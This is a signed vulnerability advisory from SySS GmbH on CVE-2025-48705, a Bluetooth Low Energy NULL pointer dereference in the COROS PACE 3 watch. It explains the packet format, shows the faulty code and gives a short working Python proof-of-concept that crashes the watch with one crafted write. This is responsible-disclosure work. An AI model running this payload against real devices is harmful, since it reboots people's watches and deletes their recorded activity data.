-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2025-027
Product:                   COROS PACE 3; other models might also be affected [6]
Manufacturer:              COROS Wearables, Inc.
Affected Version(s):       <= V 3.1008.0
Tested Version(s):         V 3.0808.0
Vulnerability Type:        NULL Pointer Dereference (CWE-476)
Risk Level:                Medium
Solution Status:           Fixed
Manufacturer Notification: 2025-03-14
Solution Date:             July/August (see vendor notes[7])
Public Disclosure:         2025-06-17
CVE Reference:             CVE-2025-48705
Author of Advisory:        Moritz Abrell, SySS GmbH
                           Jan Wütherich, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The COROS PACE 3 is a professional GPS sport smart watch.

The manufacturer describes the product as follows (see [1]):

"Improving on its legendary predecessor in every way, PACE 3 packs an 
even more powerful punch. Track your training and recovery with a watch 
that's lightweight and comfortable, with advanced technology, 
outstanding data accuracy, and backed by the industry-leading COROS 
training software system. The COROS PACE 3 paves the way to discover 
your potential."

Due to a NULL pointer dereference vulnerability, sending a specially
crafted Bluetooth Low Energy (BLE) message forces the device to reboot.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Connecting to the COROS PACE 3 and writing, e.g., the byte sequence
"0x7900ff00002e" to the characteristic with the UUID
"6e400002-b5a3-f393-e0a9-77757c7f7f70" forces the watch to reboot.
If exploited during an ongoing activity, it leads to the termination 
of the activity itself and the loss of the recorded data.

Packets beginning with 0x79 are for notifications and use the 
following basic structure:

    0      8         24        n
    +--------------------------+
    | 0x79 | Unknown | Payload |
    +--------------------------+

The payload is copied to the heap and parsed. 
It contains three different lines for the notification (L0, L1 and L2):

     4        12         n         4        12         n         4        12         n     
+-----------------------------------------------------------------------------------------+
| L0 type | L0 size | L0 data | L1 type | L1 size | L1 data | L2 type | L2 size | L2 data |
+-----------------------------------------------------------------------------------------+

A typical message would look as follows:

  4   12         n         4   12      n      4   12          n     
+----------------------------------------------------------------------+
| 0 | 00C | com.whatsapp | 1 | 006 | HACKED | 2 | 011 | Hacked by SySS |
+----------------------------------------------------------------------+
    
Each line type corresponds to its line number. 
Type 0 for the first line, type 1 for the second, and type 2 for
the third.
If the L1 data content starts with a null terminator, the L0 data, 
without the com. prefix, is copied to its place.
The code for this looks similar to the following:

    if (*l1_data == '\0') {
        char* name = strrchr(l0_data, '.');
        memcpy(l1_data, name + 1, strlen(name));
    }

Modifying the L1 type to 2 instead of 1 causes L1 to be skipped, 
thus setting l1_data to NULL.
Since the above code will still be executed, a NULL pointer will
be dereferenced, causing a crash.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following proof-of-concept script connects to a COROS PACE 3
and triggers the denial-of-service vulnerability:

####################
import asyncio
from bleak import BleakClient
import sys

DEVICE_ADDRESS = "F7:AF:1D:27:03:b0"
CHARACTERISTIC_UUID = "6e400002b5a3f393e0a977757c7f7f70"
DATA = bytes.fromhex("7900ff00002e")


async def write_to_ble_device():
    client = BleakClient(DEVICE_ADDRESS)
    try:
        await client.connect()
        await asyncio.sleep(2)  
        if client.is_connected:
            print(f"connected to {DEVICE_ADDRESS}")
            await client.write_gatt_char(CHARACTERISTIC_UUID, DATA, response=False)
    except Exception as e:
        print(f"Error: {e}")
    finally:
        if client.is_connected:
            await client.disconnect()

asyncio.run(write_to_ble_device())
####################

# Executing the script results in a reboot of the watch: 
    $ python3 poc.py

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

According to vendor note [6], the vulnerability was addressed in patches 
for several devices.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2025-03-10: Vulnerability discovered
2025-03-14: Vulnerability reported to manufacturer
2025-03-14: Confirmation of receipt received
2025-03-17: Asked the manufacturer for an update
2025-03-31: More information provided to the manufacturer
2025-04-07: Asked the manufacturer for an update
2025-04-14: Asked once again for an update
2025-04-15: Answer received from the manufacturer; manufacturer informed
            SySS GmbH that a fix is planned for June, 2025
2025-04-15: Receipt confirmed
2025-05-26: More detailed information provided to the manufacturer
2025-05-26: Manufacturer confirmed receipt
2025-06-17: Public disclosure
2025-08-06: The vendor notified us of updates to the security patch notes
2025-08-11: Advisory update

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] COROS PACE 3 product website
    https://eu.coros.com/pace3
[2] SySS Security Advisory SYSS-2025-027
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-027.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy
[4] CVE-2025-48705
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-48705
[5] Detailed blog post:
    https://blog.syss.com/posts/bluetooth-analysis-coros-pace-3/
[6] Vendor notes about the vulnerability and security patches:
    https://support.coros.com/hc/en-us/articles/38933102526996-Bluetooth-Security-Vulnerability-Statement

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell and Jan Wütherich 
of SySS GmbH.

E-Mail: moritz.abrell@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc
Key Fingerprint: 2927 7EB6 1A20 0679 79E9  87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmiZ3aoACgkQrgyb+PE0
i1NTmA//TdsRcaaagmL1HuI0Kgqw7bbd3gtR19TpZLOyV5TJwglWgY8GgoeP7eka
eW28t0DzsB3jS1rW36GqeNCS0zwjTVSOpdyhLyBr+vBMCbuqX0aeaDobla//74CZ
oTNv1DJGc5KtlQ4Ld+zVN0xCyLpPhcA5rcBFZWUzBVuPCh5/WUKJiFv2g5N4laIC
adRckYg552P06BzZiePtOmOsMKhTTB30VdYBhyXtyyGXPKqtB2MgBl4ywe3i1Plb
IHMbApIB2aIIngSr4lF9iNUednoUw8qrM0UDmMITNqwz/sMmBQ3irm6ghcApv6//
8KNfgAaGDpo6/KSmG23n8rZvfmRAauV2bbNWJNM2PwcNphENK+vI9zAWDkiCfe5I
LQQwhWwycyvsMs9iPGtwuX1ZfUgpCrAn1GHgrZQTvuJ2ltvU8eiWBF90+YVgjyLs
m8n2hPBRdJ6vpInYbphu3tRtE/gx1EW2Ia1RMjIv4iGjNwI5X4OEia2nhFqsIbGI
JHF5O1wgJfFETNR0CE0rG//V7dVUf+xuSIutQaZKD15+7zvZ2Sk8IisR9m7JN8tR
4VGp5gXoTs0y/sQAKffQ0SG85hHZqeXZVCMEyqxAXu5XS0VRkvEfQcquRXiMLIP2
iItc+HCQ8FZjT88o/7zaLGMUGm2GqV5tYqeEwWppJlgQLKeMLkQ=
=4KKc
-----END PGP SIGNATURE-----